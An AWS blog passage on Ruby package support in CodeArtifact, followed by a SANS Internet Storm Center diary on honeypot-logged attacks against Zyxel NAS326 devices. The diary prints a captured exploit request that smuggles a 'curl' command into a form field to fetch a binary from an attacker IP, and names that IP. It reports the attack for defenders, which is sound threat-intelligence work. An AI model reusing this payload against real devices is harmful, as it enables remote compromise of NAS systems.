$ gem push hola-codeartifact-0.0.0.gem 
Pushing gem to https://stormacq-test-486652066693.d.codeartifact.us-west-2.amazonaws.com/ruby/MyGemsRepo...

I verify in the console that the package is available.

CodeArtifact - Hola package is present

Now that the package is available, I can use it in my projects as usual. This involves configuring the local ~/.gemrc file on my machine. I follow the instructions provided by the console, and I make sure I replace ${CODEARTIFACT_AUTH_TOKEN} with its actual value.

CodeArtifact - console instructions to connect to the repo
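The result is roughly a ~/.gemrc along these lines (a hypothetical sketch based on the repository endpoint above; follow the console's exact instructions and substitute the real token value):

:sources:
  - https://aws:<auth-token>@stormacq-test-486652066693.d.codeartifact.us-west-2.amazonaws.com/ruby/MyGemsRepo/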

Once ~/.gemrc is correctly configured, I can install gems as usual. They will be downloaded from my private gem repository.

$ gem install hola-codeartifact

Fetching hola-codeartifact-0.0.0.gem
Successfully installed hola-codeartifact-0.0.0
Parsing documentation for hola-codeartifact-0.0.0
Installing ri documentation for hola-codeartifact-0.0.0
Done installing documentation for hola-codeartifact after 0 seconds
1 gem installed

Install from upstream
I can also associate my repository with an upstream source. It will automatically fetch gems from upstream when I request one.

To associate the repository with rubygems.org, I use the console, or I type

aws codeartifact associate-external-connection \
                   --domain stormacq-test      \
                   --repository MyGemsRepo     \
                   --external-connection public:ruby-gems-org

{
    "repository": {
        "name": "MyGemsRepo",
        "administratorAccount": "012345678912",
        "domainName": "stormacq-test",
        "domainOwner": "012345678912",
        "arn": "arn:aws:codeartifact:us-west-2:012345678912:repository/stormacq-test/MyGemsRepo",
        "upstreams": [],
        "externalConnections": [
            {
                "externalConnectionName": "public:ruby-gems-org",
                "packageFormat": "ruby",
                "status": "AVAILABLE"
            }
        ],
        "createdTime": "2024-04-12T12:58:44.101000+02:00"
    }
}

Once associated, I can pull any gems through CodeArtifact. It will automatically fetch packages from upstream when not locally available.

$ gem install rake 

Fetching rake-13.2.1.gem
Successfully installed rake-13.2.1
Parsing documentation for rake-13.2.1
Installing ri documentation for rake-13.2.1
Done installing documentation for rake after 0 seconds
1 gem installed

I use the console to verify the rake package is now available in my repo.

Things to know
There are some things to keep in mind before uploading your first Ruby packages.

Pricing and availability
CodeArtifact costs for Ruby packages are the same as for the other package formats already supported. CodeArtifact billing depends on three metrics: the storage (measured in GB per month), the number of requests, and the data transfer out to the internet or to other AWS Regions. Data transfer to AWS services in the same Region is not charged, meaning you can run your continuous integration and delivery (CI/CD) jobs on Amazon Elastic Compute Cloud (Amazon EC2) or AWS CodeBuild, for example, without incurring a charge for the CodeArtifact data transfer. As usual, the pricing page has the details.

CodeArtifact support for Ruby packages is available in all 13 Regions where CodeArtifact is offered.

Now, go build your Ruby applications and upload your private packages to CodeArtifact!

— seb

Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474, (Tue, Apr 30th)

Yesterday, I talked about attacks against a relatively recent D-Link NAS vulnerability. Today, scanning my honeypot logs, I found an odd URL that I didn't recognize. The vulnerability is a bit older but turns out to be targeting yet another NAS.

The sample request:

POST /cmd,/ck6fup6/portal_main/pkg_init_cmd/register_main/setCookie HTTP/1.0
User-Agent: Baidu
Accept: */*
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Host: [redacted]

pkgname=myZyXELcloud-Agent&cmd=%3bcurl%2089.190.156.248/amanas2&content=1

The exploit is simple: it attempts to download the "amanas2" binary and execute it. Sadly, I was not able to retrieve the file. VirusTotal does show the URL as malicious for a couple of anti-malware tools [1].

Oddly, I am seeing this pattern only in the last couple of days, even though the vulnerability and the PoC were disclosed last year [2]:

Date          Count
April 27th       56
April 28th     1530
April 29th      899
April 30th      749

Based on our logs, only one IP address exploits the vulnerability: 89.190.156.248. The IP started scanning a couple of days earlier for index pages and "jeecgFormDemoController.do", likely attempting to exploit a deserialization vulnerability in jeecgFormDemoController.

[1] https://www.virustotal.com/gui/url/ed0f3f39dce2cecca3cdc9e15099f0aa6cad3ea18f879beafe972ecd062a8229?nocache=1
[2] https://bugprove.com/knowledge-hub/cve-2023-4473-and-cve-2023-4474-authentication-bypass-and-multiple-blind-os-command-injection-vulnerabilities-in-zyxel-s-nas-326-devices/

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.